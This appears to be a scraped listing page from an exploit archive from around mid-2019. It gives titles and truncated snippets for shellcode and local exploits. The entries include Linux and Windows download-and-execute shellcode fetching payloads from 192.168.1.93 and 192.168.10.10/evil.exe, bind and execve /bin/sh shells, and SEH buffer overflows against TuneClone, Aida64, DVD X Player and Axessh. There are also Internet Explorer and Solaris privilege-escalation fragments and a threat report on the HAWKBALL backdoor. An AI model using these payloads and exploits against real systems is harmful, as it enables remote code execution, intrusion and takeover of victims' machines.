Linux/x86 - Chmod + Execute (/usr/bin/wget 192.168.1.93//x) Hide Output Shellcode (129 bytes)

Linux/x86 - Chmod + Execute /usr/bin/wget http://192.168.1.93//x + Hide Output Shellcode 129 bytes / ; Shellcode 129 Bytes ; download via wget + chmod + execute shellcode + hide output ; Exec: /usr/bin/wget http://192.168.1.93//x /dev/null 2&1 ; global start section .text start: ;fork xor eax,eax...

Linux/x86 - ASCII AND, SUB, PUSH, POPAD Encoder Shellcode

!/usr/bin/env python3 INTRODUCTION Encoder Title: ASCII shellcode encoder via AND, SUB, PUSH, POPAD Date: 26.6.2019 Encoder Author: Petr Javorik, www.mmquant.net Tested on: Linux ubuntu 3.13.0-32-generic, x86 Special thx to: Corelanc0d3r for intro to this technique Description: This encoder is...

Windows/x86 - bitsadmin Download and Execute Shellcode (210 Bytes)

/ ; Windows/x86 - bitsadmin Download and Execute http://192.168.10.10/evil.exe c:\evil.exe Shellcode 210 Bytes ; Shellcode Title : bitsadmin download and execute ; Shellcode Author : Joseph McDonagh ; Date June 26, 2019 ; Shellcode Length 210 ; However, if the application you are exploiting alrea...

Tuneclone 2.20 - Local SEH Buffer Overflow

Tuneclone 2.20 - Local SEH Buffer Overflow Exploit Title: TuneClone Local Seh Exploit Date: 19.06.2019 Vendor Homepage: http://www.tuneclone.com/ Software Link: http://www.tuneclone.com/tuneclonesetup.exe Exploit Author: Achilles Tested Version: 2.20 Tested on: Windows XP SP3 EN 1.- Run python co...

Tuneclone 2.20 - Local SEH Buffer Overflow

Exploit Title: TuneClone Local Seh Exploit Date: 19.06.2019 Vendor Homepage: http://www.tuneclone.com/ Software Link: http://www.tuneclone.com/tuneclonesetup.exe Exploit Author: Achilles Tested Version: 2.20 Tested on: Windows XP SP3 EN 1.- Run python code : TuneClone.py 2.- Open EVIL.txt and cop...

Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)

Title: Linux/x86 - Reposition + INC encoder with execve/bin/sh Shellcode 66 bytes Author: Jonathan So Purpose: decode and spawn a /bin/sh shell Tested On: Linux kali 4.19.0-kali4-686 1 SMP Debian 4.19.28-2kali1 2019-03-18 i686 GNU/Linux Arch: x86 Size: 66 bytes Write-up Link:...

Aida64 6.00.5100 SEH Buffer Overflow

!/usr/bin/python Exploit : Aida64 6.00.5100 'Log to CSV File' Local SEH Buffer Overflow Exploit Author : Nipun Jaswal Tested On : Windows 7 Home Basicx86 Version : 6.00.5100 Release Date : 31/May/2019 Build : 21/May/2019 Vendor Homepage: https://www.aida64.com/downloads Software Link:...

Aida64 6.00.5100 - (Log to CSV File) Local SEH Buffer Overflow Exploit

Exploit for windows platform in category local exploits !/usr/bin/python Exploit : Aida64 6.00.5100 'Log to CSV File' Local SEH Buffer Overflow Exploit Author : Nipun Jaswal Tested On : Windows 7 Home Basicx86 Version : 6.00.5100 Vendor Homepage: https://www.aida64.com/downloads Software Link:...

Aida64 6.00.5100 - 'Log to CSV File' Local SEH Buffer Overflow

!/usr/bin/python Exploit : Aida64 6.00.5100 'Log to CSV File' Local SEH Buffer Overflow Exploit Author : Nipun Jaswal Tested On : Windows 7 Home Basicx86 Version : 6.00.5100 Release Date : 31/May/2019 Build : 21/May/2019 Vendor Homepage: https://www.aida64.com/downloads Software Link:...

Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)

;Title: Linux/x8664 - Bind 4444/TCP Shell /bin/sh 104 bytes ;Author: Aron Mihaljevic ;Architecture: Linux x8664 ;Shellcode Length: 104 bytes ;github = https://github.com/STARRBOY ;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444"...

Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) #Shellcode (131 bytes)

Exploit for linux/x86-64 platform in category shellcode ;Title: Linux/x8664 - Bind 4444/TCP Shell /bin/sh ;Author: Aron Mihaljevic ;Architecture: Linux x8664 ;Shellcode Length: 131 bytes ;github = https://github.com/STARRBOY ;test shellcode = after you run the shellcode, open another terminal and...

Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities

FireEye Labs recently observed an attack against the government sector in Central Asia. The attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802. HAWKBALL is a backdoor that attackers can use to collect...

DVD X Player 5.5 Pro - Local Buffer Overflow (SEH) Exploit

Exploit for windows platform in category local exploits Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH Exploit Author: Kevin Randall Vendor Homepage: http://www.dvd-x-player.com/download.htmldvdPlayer Software Link: http://www.dvd-x-player.com/download.htmldvdPlayer Version: 5.5...

DVD X Player 5.5 Pro Local Buffer Overflow

Exploit Title: DVDXPlayer 5.5 Pro Local Buffer Overflow with SEH Date: 6-3-2019 Exploit Author: Kevin Randall Vendor Homepage: http://www.dvd-x-player.com/download.htmldvdPlayer Software Link: http://www.dvd-x-player.com/download.htmldvdPlayer Version: 5.5 Pro Tested on: Windows 7 CVE : N/A...

Axessh 4.2 - Log file name Local Stack-based Buffer Overflow

Axessh 4.2 - Log file name Local Stack-based Buffer Overflow Title: Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow Date: May 23rd, 2019 Author: Uday Mittal https://github.com/yaksas443/YaksasCSC-Lab/ Vendor Homepage: http://www.labf.com Software Link:...

Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption

Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption Content Dim ar1&h3000000 Dim ar21000 Dim gremlin addressOfGremlin = &h28281000 Class MyClass Private mValue Public Property Let Valuev mValue = v End Property Public Default Property Get P P = mValue ' Wher...

Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)

/ ;Category: Shellcode ;Title: GNU/Linux x8664 - execve /bin/sh ;Author: rajvardhan ;Architecture: Linux x8664 ;Possibly The Smallest And Fully Reliable Shellcode =========== Asm Source =========== global start section .text start: xor rsi,rsi push rsi mov rdi,0x68732f2f6e69622f push rdi push rsp...

Axessh 4.2 - (Log file name) Local Stack-based Buffer Overflow Exploit

Exploit for windows platform in category local exploits Title: Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow Date: May 23rd, 2019 Author: Uday Mittal https://github.com/yaksas443/YaksasCSC-Lab/ Vendor Homepage: http://www.labf.com Software Link:...

Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow

Title: Axessh 4.2 - 'Log file name' Local Stack-based Buffer Overflow Date: May 23rd, 2019 Author: Uday Mittal https://github.com/yaksas443/YaksasCSC-Lab/ Vendor Homepage: http://www.labf.com Software Link: http://www.labf.com/download/axessh.exe Version v4.2 Tested on: Windows 7 SP1 EN x86...

Solaris 7/8/9 (#SPARC) - (dtprintinfo) Local Privilege Escalation (1) Exploit

Exploit for solaris platform in category local exploits / raptordtprintnamesparc.c - dtprintinfo 0day, Solaris/SPARC Copyright c 2004-2019 Marco Ivaldi 0day buffer overflow in the dtprintinfo1 CDE Print Viewer, leading to local root. Many thanks to Dave Aitel for discovering this vulnerability an...